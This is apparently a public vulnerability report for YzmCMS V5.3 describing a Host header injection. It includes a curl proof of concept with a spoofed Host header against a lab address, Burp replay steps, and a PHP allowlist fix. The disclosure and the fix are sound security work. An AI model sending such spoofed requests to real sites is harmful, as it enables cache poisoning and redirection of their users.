About YzmCMS V5.3- 'Host' Header Injection #28

Open
@dpalbd


A Host header injection vulnerability was found in YzmCMS V5.3. Using this attack, a malicious user can poison the web cache or cause arbitrary user redirection.

PoC:
Test Environment: Windows 7 SP1(64bit)
XAMPP: 7.3.9
YzmCMS V5.3 Access Path: 192.168.30.169/yzmcms/

```
root@kali:~# curl http://192.168.30.169/yzmcms/member/ -H "Host: www.google.com"

<title>YzmCMS提示信息</title> <style type="text/css"> *{padding:0;margin:0;} body{background:#fff;color:#000;font-family:"Microsoft Yahei","Hiragino Sans GB","Helvetica Neue",Helvetica,tahoma,arial,"WenQuanYi Micro Hei",Verdana,sans-serif;} #msg{border:1px solid #5eb95e;width:500px;position:absolute;top:44%;left:50%;margin:-87px 0 0 -250px;padding:1px;line-height:30px;text-align:center;font-size:16px;background:#fff;} #msgtit{height:35px;line-height:35px;color:#fff;background:#5eb95e;} #msgbody{margin:20px 0;text-align:center} #info{margin-bottom:10px;} #msgbody p{font-size:14px;} #msgbody p a{font-size:14px;color:#333;text-decoration:none;} #msgbody p a:hover{color:#5a98de;} </style>
提示信息
请先登录!

本页面将在1秒后跳转...

root@kali:~#
```


Or, if we capture this in Burp:

```
GET /yzmcms/member/ HTTP/1.1
Host: 192.168.30.169
```

Next, change the "Host" to www.google.com and click "Go" to send the web request:
image

Then follow the redirection:
image

This will be redirected to www.google.com with a 404 response.
Capturing the response and opening it in the browser will show the following:
image

This was detected and emailed to you on 18-Sep-2019, but there was no response, so I am providing the information here. Thank you.
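
One way to close this, as an added example that is not YzmCMS's own code: it assumes the redirect target is built from the request's `Host` header, and `ALLOWED_HOSTS`, `DEFAULT_HOST`, `trusted_host()` and `absolute_url()` are hypothetical names. The client-supplied header is only used when it matches an allowlist; otherwise the configured host is used.

```php
<?php
// Hostnames this deployment may answer for (constructed values for the
// example; 'cms.example.test' is a placeholder, not a real YzmCMS setting).
const ALLOWED_HOSTS = ['192.168.30.169', 'cms.example.test'];
const DEFAULT_HOST  = '192.168.30.169';

/**
 * Return the host to use when building absolute URLs.
 * The Host header is attacker-controlled, so it is accepted only when it is
 * a syntactically plain host[:port] whose host part is on the allowlist.
 */
function trusted_host(array $server): string
{
    $raw = strtolower(trim($server['HTTP_HOST'] ?? ''));
    // Rejects '@', '/', whitespace and anything else that is not host[:port].
    if (!preg_match('/^([a-z0-9.-]+)(?::\d{1,5})?$/', $raw, $m)) {
        return DEFAULT_HOST;
    }
    return in_array($m[1], ALLOWED_HOSTS, true) ? $raw : DEFAULT_HOST;
}

/** Build an absolute URL from the trusted host instead of the raw header. */
function absolute_url(array $server, string $path): string
{
    $https  = !empty($server['HTTPS']) && $server['HTTPS'] !== 'off';
    $scheme = $https ? 'https' : 'http';
    return $scheme . '://' . trusted_host($server) . '/' . ltrim($path, '/');
}

// Constructed requests: the legitimate Host, the spoofed Host from the
// report, and a malformed value.
foreach (['192.168.30.169', 'www.google.com', 'a.test:80@b'] as $host) {
    $url = absolute_url(['HTTP_HOST' => $host], '/yzmcms/member/');
    echo str_pad($host, 16), ' -> ', $url, PHP_EOL;
}
```

The same allowlist can also be enforced in front of the application, by having the web server reject requests whose `Host` does not match a configured site name.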
